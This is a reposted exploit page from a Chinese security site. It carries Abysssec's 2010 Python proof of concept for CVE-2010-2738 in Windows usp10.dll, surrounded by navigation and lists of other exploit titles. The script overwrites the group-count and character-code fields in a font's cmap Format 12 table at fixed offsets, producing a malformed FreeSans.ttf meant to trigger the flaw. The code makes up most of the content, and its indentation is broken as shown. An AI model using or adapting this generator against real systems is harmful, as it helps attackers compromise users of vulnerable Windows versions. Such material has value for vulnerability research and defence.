首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Unicode Scripts Processor Remote Code Execution
来源:http://www.abysssec.com 作者:Abysssec 发布时间:2010-10-01  

'''
 
  __  __  ____         _    _ ____ 
 |  \/  |/ __ \   /\  | |  | |  _ \
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ <  (Final Binary Analysis)
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/

'''

'''
  Title             : Microsoft Unicode Scripts Processor Remote Code Execution
  Version           : usp10.dll XP , Vista
  Analysis          : http://www.abysssec.com
  Vendor            : http://www.microsoft.com
  Impact            : Critical
  Contact           : shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter           : @abysssec
  CVE               : CVE-2010-2738
  MOAUB Number      : MOAUB-FINAL

http://www.exploit-db.com/moaub-30-microsoft-unicode-scripts-processor-remote-code-execution-ms10-063/
http://www.exploit-db.com/sploits/moaub-30-PoC.zip
'''

import sys
import struct
def main():
  
    try:
    
  fdR = open('src.ttf', 'rb+')
  strTotal = fdR.read()
  str1 = strTotal[:18316]
  nGroups = '\x00\x00\x00\xDC'          # nGroups field from Format 12 subtable  of cmap table
  startCharCode = '\x00\xE5\xF7\x20'    # startCharCode  field from a Group Structure
  endCharCode  = '\x00\xE5\xF7\xFE'     # endCharCode  field from a Group Structure
  str2 = strTotal[18328:]
  
  fdW= open('FreeSans.ttf', 'wb+')
  fdW.write(str1)
  fdW.write(nGroups)
  fdW.write(startCharCode)
  fdW.write(endCharCode)
  fdW.write(str2)
  fdW.close()
  fdR.close()
  print '[-] Font file generated'
    except IOError:
        print '[*] Error : An IO error has occurred'
        print '[-] Exiting ...'
        sys.exit(-1)
               
if __name__ == '__main__':
    main()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Quick Player 1.3 Unicode SEH E
·Joomla JE Job Component SQL in
·XFS Deleted Inode Local Inform
·Joomla JE Directory Component
·Webspell wCMS-Clanscript4.01.0
·Microsoft IIS 6.0 ASP Stack Ov
·Linux Kernel < 2.6.36-rc6 pktc
·Trend Micro Internet Security
·Evaria Content Management Syst
·Digital Music Pad Version 8.2.
·win32/xp sp3 (Tr) About Box Sh
·iworkstation Version 9.3.2.1.4
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved